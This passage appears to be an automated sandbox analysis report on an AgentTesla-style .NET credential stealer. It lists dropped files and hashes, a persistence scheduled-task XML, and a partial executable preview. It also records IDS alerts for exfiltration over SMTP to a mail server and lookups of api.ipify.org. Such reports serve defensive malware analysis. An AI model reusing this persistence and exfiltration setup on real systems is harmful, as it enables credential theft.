                                                  WxuqCcSnq2.exeGet hashmaliciousBrowse
                                                  • 3.232.242.170
                                                  • 52.20.78.240

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1216
                                                  Entropy (8bit):5.355304211458859
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                                  MD5:69206D3AF7D6EFD08F4B4726998856D3
                                                  SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                                  SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                                  SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                                  Malicious:true
                                                  Reputation:high, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nrQtAokXKaSn.exe.log

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1216
                                                  Entropy (8bit):5.355304211458859
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                                  MD5:69206D3AF7D6EFD08F4B4726998856D3
                                                  SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                                  SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                                  SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                  C:\Users\user\AppData\Local\Temp\tmp152E.tmp

                                                  Download File
                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1657
                                                  Entropy (8bit):5.1584897189168
                                                  Encrypted:false
                                                  SSDEEP:24:2dH4+SEqC/S7h2ulNMFp2O/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB3PItn:cbha7JlNQV/rydbz9I3YODOLNdq3Ju
                                                  MD5:03051B1F18A035DE03D059366AC0473E
                                                  SHA1:155345324D235531556DDFE9F16B9C056D4C9505
                                                  SHA-256:92BF6136677687B06E7E22A50F24B0DD8B0B5FA6C3A89DA9516AAC6259ACA56D
                                                  SHA-512:1EB4CCBBD475035EAEF04AFCEB318583B8BB26F350AF5B68D7F19D080AEEADA96B67E00DC89DE4CA4608561B3F6AB64D135A505B322D24BBDE60437B8FA491CC
                                                  Malicious:true
                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvail

                                                  C:\Users\user\AppData\Local\Temp\tmpCC0B.tmp

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1657
                                                  Entropy (8bit):5.1584897189168
                                                  Encrypted:false
                                                  SSDEEP:24:2dH4+SEqC/S7h2ulNMFp2O/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB3PItn:cbha7JlNQV/rydbz9I3YODOLNdq3Ju
                                                  MD5:03051B1F18A035DE03D059366AC0473E
                                                  SHA1:155345324D235531556DDFE9F16B9C056D4C9505
                                                  SHA-256:92BF6136677687B06E7E22A50F24B0DD8B0B5FA6C3A89DA9516AAC6259ACA56D
                                                  SHA-512:1EB4CCBBD475035EAEF04AFCEB318583B8BB26F350AF5B68D7F19D080AEEADA96B67E00DC89DE4CA4608561B3F6AB64D135A505B322D24BBDE60437B8FA491CC
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvail

                                                  C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):847360
                                                  Entropy (8bit):7.451826150772928
                                                  Encrypted:false
                                                  SSDEEP:12288:/mMlc1PL/pFr5cE8LHWU/SEdRMA/LyVu6gtXSRxS36qGn3eV6H5ADAUaoZqxIB/N:eqvLj9/L1tsAK/n3eVk55Ul4x+/yIn
                                                  MD5:FE1AA7FA995970EBB34465D5DC0D8CE1
                                                  SHA1:7505B261CC9DF8C6AB8F10E035CF8D8319043CDB
                                                  SHA-256:655B12A219D0F0E39A84FE44483E25411BE852CE2BB0D451A1CB1A9A670F70B8
                                                  SHA-512:245277E1F0F637BDA7E2B5D1F76AE06656AEB0A7DF47EB428EDF8C6472F9AF03580234B9CD4A95321A96E6511D9E75279C452C5B58AE182B060A6CA35949A77C
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 32%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....c..............P.................. ... ....@.. .......................`............@.....................................K.... .......................@......[................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H............................:..........................................Z(....8.....(....8....*.&~.......*...~....*.b(....8......(....8.....*...&~.......*...~....*..0..~.......8O.......E....$...8....s.........8....s.........8)...*s.........8....s.........8....(....8....s......... .....:....& ....8.......0...........~....o......8......*8....8......0..$.......8....8....8......*.~....o......8.....0...........~....o......8....8....8......*..0...........~....o......8....8....8....

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.451826150772928
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Windows Screen Saver (13104/52) 0.07%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  File name:SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
                                                  File size:847360
                                                  MD5:fe1aa7fa995970ebb34465d5dc0d8ce1
                                                  SHA1:7505b261cc9df8c6ab8f10e035cf8d8319043cdb
                                                  SHA256:655b12a219d0f0e39a84fe44483e25411be852ce2bb0d451a1cb1a9a670f70b8
                                                  SHA512:245277e1f0f637bda7e2b5d1f76ae06656aeb0a7df47eb428edf8c6472f9af03580234b9cd4a95321a96e6511d9e75279c452c5b58ae182b060a6ca35949a77c
                                                  SSDEEP:12288:/mMlc1PL/pFr5cE8LHWU/SEdRMA/LyVu6gtXSRxS36qGn3eV6H5ADAUaoZqxIB/N:eqvLj9/L1tsAK/n3eVk55Ul4x+/yIn
                                                  TLSH:B0057C9573728973F1CF01359095718C6EBCE543A2A6E2076FB63A8146027BFFA9CE41
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c..............P.................. ... ....@.. .......................`............@................................

                                                  File Icon

                                                  Icon Hash:00828e8e8686b000

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x4d02ee
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x6385E21F [Tue Nov 29 10:42:39 2022 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xd02a00x4b.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xd20000x5c8.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xd40000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xd025b0x1c.text
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000xce2f40xce400False0.764352509469697data7.457613017086461IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rsrc0xd20000x5c80x600False0.427734375data4.1465073095381015IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0xd40000xc0x200False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountry
                                                  RT_VERSION0xd20a00x33cdata
                                                  RT_MANIFEST0xd23dc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                                                  Imports

                                                  DLLImport
                                                  mscoree.dll_CorExeMain

                                                  Network Behavior

                                                  Snort IDS Alerts

                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                  192.168.2.6111.118.212.38497175872030171 11/29/22-16:51:24.449797TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49717587192.168.2.6111.118.212.38
                                                  192.168.2.6111.118.212.38497225872030171 11/29/22-16:52:18.188399TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49722587192.168.2.6111.118.212.38

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 29, 2022 16:50:57.881586075 CET49713443192.168.2.652.20.78.240
                                                  Nov 29, 2022 16:50:57.881650925 CET4434971352.20.78.240192.168.2.6
                                                  Nov 29, 2022 16:50:57.881889105 CET49713443192.168.2.652.20.78.240
                                                  Nov 29, 2022 16:50:58.005610943 CET49713443192.168.2.652.20.78.240
                                                  Nov 29, 2022 16:50:58.005644083 CET4434971352.20.78.240192.168.2.6
                                                  Nov 29, 2022 16:50:58.314330101 CET4434971352.20.78.240192.168.2.6
                                                  Nov 29, 2022 16:50:58.314445019 CET49713443192.168.2.652.20.78.240
                                                  Nov 29, 2022 16:50:58.332873106 CET49713443192.168.2.652.20.78.240
                                                  Nov 29, 2022 16:50:58.332928896 CET4434971352.20.78.240192.168.2.6
                                                  Nov 29, 2022 16:50:58.333657026 CET4434971352.20.78.240192.168.2.6
                                                  Nov 29, 2022 16:50:58.413805962 CET49713443192.168.2.652.20.78.240
                                                  Nov 29, 2022 16:50:59.610924959 CET49713443192.168.2.652.20.78.240
                                                  Nov 29, 2022 16:50:59.610958099 CET4434971352.20.78.240192.168.2.6
                                                  Nov 29, 2022 16:50:59.757527113 CET4434971352.20.78.240192.168.2.6
                                                  Nov 29, 2022 16:50:59.757646084 CET4434971352.20.78.240192.168.2.6
                                                  Nov 29, 2022 16:50:59.757844925 CET49713443192.168.2.652.20.78.240
                                                  Nov 29, 2022 16:50:59.763855934 CET49713443192.168.2.652.20.78.240
                                                  Nov 29, 2022 16:51:19.879105091 CET49717587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:51:20.153131008 CET58749717111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:51:20.155756950 CET49717587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:51:21.977685928 CET58749717111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:51:21.978070021 CET49717587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:51:22.252252102 CET58749717111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:51:22.253521919 CET49717587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:51:22.526686907 CET58749717111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:51:22.527221918 CET49717587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:51:22.840261936 CET58749717111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:51:23.584398985 CET58749717111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:51:23.585345030 CET49717587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:51:23.860565901 CET58749717111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:51:23.860614061 CET58749717111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:51:23.860863924 CET49717587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:51:24.168071032 CET58749717111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:51:24.169872999 CET49717587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:51:24.442694902 CET58749717111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:51:24.443375111 CET58749717111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:51:24.449796915 CET49717587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:51:24.449903011 CET49717587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:51:24.449991941 CET49717587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:51:24.450061083 CET49717587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:51:24.722711086 CET58749717111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:51:24.724167109 CET58749717111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:51:24.771972895 CET49717587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:51:46.825879097 CET49720443192.168.2.63.232.242.170
                                                  Nov 29, 2022 16:51:46.825941086 CET443497203.232.242.170192.168.2.6
                                                  Nov 29, 2022 16:51:46.826066017 CET49720443192.168.2.63.232.242.170
                                                  Nov 29, 2022 16:51:46.846575975 CET49720443192.168.2.63.232.242.170
                                                  Nov 29, 2022 16:51:46.846611977 CET443497203.232.242.170192.168.2.6
                                                  Nov 29, 2022 16:51:47.147500992 CET443497203.232.242.170192.168.2.6
                                                  Nov 29, 2022 16:51:47.147674084 CET49720443192.168.2.63.232.242.170
                                                  Nov 29, 2022 16:51:47.156049967 CET49720443192.168.2.63.232.242.170
                                                  Nov 29, 2022 16:51:47.156074047 CET443497203.232.242.170192.168.2.6
                                                  Nov 29, 2022 16:51:47.156639099 CET443497203.232.242.170192.168.2.6
                                                  Nov 29, 2022 16:51:47.261645079 CET49720443192.168.2.63.232.242.170
                                                  Nov 29, 2022 16:51:48.546381950 CET49720443192.168.2.63.232.242.170
                                                  Nov 29, 2022 16:51:48.546422958 CET443497203.232.242.170192.168.2.6
                                                  Nov 29, 2022 16:51:48.813997984 CET443497203.232.242.170192.168.2.6
                                                  Nov 29, 2022 16:51:48.814122915 CET443497203.232.242.170192.168.2.6
                                                  Nov 29, 2022 16:51:48.814193010 CET49720443192.168.2.63.232.242.170
                                                  Nov 29, 2022 16:51:48.816801071 CET49720443192.168.2.63.232.242.170
                                                  Nov 29, 2022 16:52:11.437999010 CET49722587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:52:11.715953112 CET58749722111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:52:11.716146946 CET49722587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:52:14.190653086 CET58749722111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:52:14.194787025 CET49722587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:52:14.473042011 CET58749722111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:52:14.499712944 CET49722587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:52:14.778090954 CET58749722111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:52:14.842102051 CET49722587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:52:16.164179087 CET49722587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:52:16.482769012 CET58749722111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:52:17.294580936 CET58749722111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:52:17.297631979 CET49722587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:52:17.575767994 CET58749722111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:52:17.575813055 CET58749722111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:52:17.576160908 CET49722587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:52:17.894834995 CET58749722111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:52:17.900510073 CET58749722111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:52:17.901293039 CET49722587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:52:18.179555893 CET58749722111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:52:18.179738045 CET58749722111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:52:18.188399076 CET49722587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:52:18.188513041 CET49722587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:52:18.188616991 CET49722587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:52:18.188690901 CET49722587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 16:52:18.466383934 CET58749722111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:52:18.467991114 CET58749722111.118.212.38192.168.2.6
                                                  Nov 29, 2022 16:52:18.514267921 CET49722587192.168.2.6111.118.212.38

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 29, 2022 16:50:57.772516966 CET5908253192.168.2.68.8.8.8
                                                  Nov 29, 2022 16:50:57.789524078 CET53590828.8.8.8192.168.2.6
                                                  Nov 29, 2022 16:50:57.822091103 CET5950453192.168.2.68.8.8.8
                                                  Nov 29, 2022 16:50:57.841023922 CET53595048.8.8.8192.168.2.6
                                                  Nov 29, 2022 16:51:19.333461046 CET6322953192.168.2.68.8.8.8
                                                  Nov 29, 2022 16:51:19.724127054 CET53632298.8.8.8192.168.2.6
                                                  Nov 29, 2022 16:51:19.859044075 CET6253853192.168.2.68.8.8.8
                                                  Nov 29, 2022 16:51:19.876422882 CET53625388.8.8.8192.168.2.6
                                                  Nov 29, 2022 16:51:46.733128071 CET5612253192.168.2.68.8.8.8
                                                  Nov 29, 2022 16:51:46.752038956 CET53561228.8.8.8192.168.2.6
                                                  Nov 29, 2022 16:51:46.779407978 CET5255653192.168.2.68.8.8.8
                                                  Nov 29, 2022 16:51:46.796346903 CET53525568.8.8.8192.168.2.6
                                                  Nov 29, 2022 16:52:10.584884882 CET5248153192.168.2.68.8.8.8
                                                  Nov 29, 2022 16:52:10.964626074 CET53524818.8.8.8192.168.2.6
                                                  Nov 29, 2022 16:52:11.035455942 CET5394353192.168.2.68.8.8.8
                                                  Nov 29, 2022 16:52:11.434695959 CET53539438.8.8.8192.168.2.6

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Nov 29, 2022 16:50:57.772516966 CET192.168.2.68.8.8.80x2ea1Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:50:57.822091103 CET192.168.2.68.8.8.80xa8aaStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:51:19.333461046 CET192.168.2.68.8.8.80xe3daStandard query (0)mail.strictfacilityservices.comA (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:51:19.859044075 CET192.168.2.68.8.8.80xf4baStandard query (0)mail.strictfacilityservices.comA (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:51:46.733128071 CET192.168.2.68.8.8.80x1df9Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:51:46.779407978 CET192.168.2.68.8.8.80x6660Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:52:10.584884882 CET192.168.2.68.8.8.80x1930Standard query (0)mail.strictfacilityservices.comA (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:52:11.035455942 CET192.168.2.68.8.8.80xd825Standard query (0)mail.strictfacilityservices.comA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Nov 29, 2022 16:50:57.789524078 CET8.8.8.8192.168.2.60x2ea1No error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)false
                                                  Nov 29, 2022 16:50:57.789524078 CET8.8.8.8192.168.2.60x2ea1No error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)false
